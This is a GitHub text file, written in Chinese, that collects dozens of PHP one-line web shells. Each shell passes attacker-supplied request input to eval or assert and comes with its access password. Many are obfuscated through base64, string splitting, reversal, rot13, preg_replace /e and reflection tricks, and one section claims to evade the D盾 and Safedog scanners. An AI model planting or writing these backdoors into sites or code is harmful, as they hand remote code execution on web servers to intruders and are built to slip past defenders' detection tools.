-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy path常见一句话.txt
173 lines (119 loc) · 5.21 KB
/
常见一句话.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
<?php eval(@$_POST['a']); ?>
/*--------------------------------------------------------------------------------*/
<?php assert(@$_POST['a']); ?>
/*--------------------------------------------------------------------------------*/
<?php eval_r($_POST['a'])?>
/*--------------------------------------------------------------------------------*/
<?php @eval_r($_POST['a'])?>//加@忽略报错
/*--------------------------------------------------------------------------------*/
<?php assert($_POST['a']);?>
/*--------------------------------------------------------------------------------*/
<?$_POST['a']($_POST['b']);?>
/*--------------------------------------------------------------------------------*/
<?$_POST['a']($_POST['b'],$_POST['c'])?>
/*--------------------------------------------------------------------------------*/
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
/*--------------------------------------------------------------------------------*/
<O>h=@eval_r($_POST1);</O>
/*--------------------------------------------------------------------------------*/
<script language="php">@eval_r($_POST['a'])</script>//绕过<?限制
/*--------------------------------------------------------------------------------*/
<?php $a = base64_decode(Y.X.N.z.Z.X.J01);$a($_POST[g]);?>
/*--------------------------------------------------------------------------------*/
<?php $x_x=base64_decode(Y.X.N.z.Z.X.J01);$x_x(($_POST[$_GET[a]]));?>
/*--------------------------------------------------------------------------------*/
<?php $p=base64_decode("bW93YW5n");$i['j']='assert';$a[]=$i;@$a[0]['j']($_POST[$p]);$filename = $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);function set_writeable($file_name){if(@chmod($file_name,0444)){echo "OK";}else{echo "no";}}set_writeable($filename);?>
//密码mowang
/*--------------------------------------------------------------------------------*/
<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>
//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 c
/*--------------------------------------------------------------------------------*/
<?php assert($_REQUEST["c"]);?> //菜刀连接 躲避检测 密码c
/*--------------------------------------------------------------------------------*/
<?php $Exp=strrev($_POST[‘longmo’]);eval($Exp($_POST[z0]));?>
//密码longmo
/*--------------------------------------------------------------------------------*/
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[cc]); ?>
/*--------------------------------------------------------------------------------*/
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
//密码-7
/*--------------------------------------------------------------------------------*/
<?php
array_map("ass\x65rt",(array)$_REQUEST['zhe']);?>
?>
//密码zhe
/*--------------------------------------------------------------------------------*/
<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['xiaozhe']);
?>
//密码xiaozhe
/*--------------------------------------------------------------------------------*/
<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["#"]); ?>
//密码#
/*--------------------------------------------------------------------------------*/
<?($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');?>
//密码b4dboy
/*--------------------------------------------------------------------------------*/
<?php
$a = $_REQUEST['id'];
preg_replace('/.*/e',' '.$a,'');
?>
?id=eval%28base64_decode%28%22QGV2YWwoJF9QT1NUWydjJ10pOw%22%29%29; 密码c
/*--------------------------------------------------------------------------------*/
<?php
$p =& $_GET;array_map($p['call'],$p);
?>
//密码call
/*--------------------------------------------------------------------------------*/
<?php $lang = (string)key($_POST);$lang($_POST['test']);?>
//密码test
/*--------------------------------------------------------------------------------*/
<?php $e = $_REQUEST['e'];$arr = array($_POST['settoken'],);array_map(base64_decode($e), $arr);?>
//密码settoken
/*--------------------------------------------------------------------------------*/
<?php
/**
* $a=$_POST[];
* assert
*/
$a='';
class TestClass { }
$rc = new ReflectionClass('TestClass');
$str=$rc->getDocComment();
$pos=strpos($str,'$a');
$eval=substr($str,$pos,15);
$pos=strpos($str,'assert');
$fun=substr($str,$pos,6);
echo $eval;
$fun($eval);
echo $a;
$fun($a);
?>
//密码TestClass
/*--------------------------------------------------------------------------------*/
过D盾过安全狗
<?php
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function yuag_array($b,$c){
$b=strrev($b);
print "www.baidu.com";
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['Test']);
<?php
$a ="www.baidu.com";
function yuag($a){
eval($a);
}
@
yuag($_POST['Test']);
/*--------------------------------------------------------------------------------*/